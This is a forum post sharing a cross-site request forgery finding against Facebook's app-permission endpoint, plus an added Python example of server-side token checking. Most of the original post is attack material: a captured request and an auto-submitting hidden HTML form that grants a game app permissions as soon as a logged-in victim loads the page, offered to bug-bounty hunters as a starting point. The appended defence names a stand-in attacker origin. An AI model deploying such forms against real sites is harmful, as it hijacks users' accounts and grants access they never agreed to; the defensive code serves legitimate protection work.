Friends, let me share with you a CSRF that was found in Facebook.
Admittedly the net is full of these, but you have to start somewhere, so I thought I'd share it as a source of inspiration. CSRF and XSS hunters, you can work from here; I hope you too find vulnerabilities like this and earn a bounty, as others have.
Code:
POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800

fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40
Code:
<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action="https://www.facebook.com/connect/uiserver.php" method="POST">
<input type="hidden" name="perms" value="" />
<input type="hidden" name="dubstep" value=1 />
<input type="hidden" name="new_user_session" value=1 />
<input type="hidden" name="grant_clicked" value=1 />
<input type="hidden" name="send_to_mobile_redirect_uri" value="https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter" />
<input type="hidden" name="app_id" value="2389801228" />
<input type="hidden" name="redirect_uri" value="https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1" />
<input type="hidden" name="app_center" value=1 />
<input type="hidden" name="is_paid_app" value="" />
<input type="hidden" name="app_center_ref" value="appcenter" />
<input type="hidden" name="response_type" value="none" />
<input type="hidden" name="from_post" value=1 />
<input type="hidden" name="__uiserv_method" value="permissions.request" />
<input type="hidden" name="grant_clicked" value="Play+Game" />
</form>
</body>
</html>
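Added example, not part of the original post and not Facebook's code: the form above leaves out the `fb_dtsg` field that the captured request carries, so the defence is a server-side check that refuses any state-changing POST without a valid session-bound token. The HMAC token scheme, the key, the session ids, the allowed-origin list and the function names are assumptions made for illustration.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlencode

SERVER_KEY = b"constructed-demo-key"            # assumption: per-deployment secret
ALLOWED_ORIGINS = {"https://www.facebook.com"}  # assumption: first-party origin
TOKEN_FIELD = "fb_dtsg"                         # token field seen in the captured request


def issue_token(session_id: str) -> str:
    """Hypothetical scheme: anti-CSRF token = HMAC(server key, session id)."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def check_state_change(session_id: str, headers: dict, body: str):
    """Decide whether a state-changing POST may proceed; returns (ok, reason)."""
    form = parse_qs(body, keep_blank_values=True)
    tokens = form.get(TOKEN_FIELD, [])
    if len(tokens) != 1:                 # absent (as in the auto-submitting form) or repeated
        return False, "token missing or duplicated"
    expected = issue_token(session_id).encode()
    if not hmac.compare_digest(tokens[0].encode(), expected):
        return False, "token not bound to this session"
    origin = headers.get("Origin")       # defence in depth when the browser sends it
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-site origin"
    return True, "ok"


# Constructed inputs: field names come from the post, values are shortened samples.
SESSION = "constructed-session-id"
COMMON = [("perms", ""), ("dubstep", "1"), ("grant_clicked", "1"),
          ("app_id", "2389801228"), ("response_type", "none"),
          ("__uiserv_method", "permissions.request")]
GENUINE = urlencode([(TOKEN_FIELD, issue_token(SESSION))] + COMMON)
FORGED = urlencode(COMMON)                                  # the form carries no token
GUESSED = urlencode([(TOKEN_FIELD, "AQA-UJ7c")] + COMMON)   # token from another session

if __name__ == "__main__":
    site = {"Origin": "https://www.facebook.com"}
    other = {"Origin": "https://attacker.example"}
    for name, hdrs, body in [("genuine", site, GENUINE), ("forged", other, FORGED),
                             ("guessed", other, GUESSED), ("bad origin", other, GENUINE)]:
        print(name, check_state_change(SESSION, hdrs, body))
```

The token check runs before any permission change is processed; the `Origin` comparison is a second layer and is skipped only when the browser sends no such header.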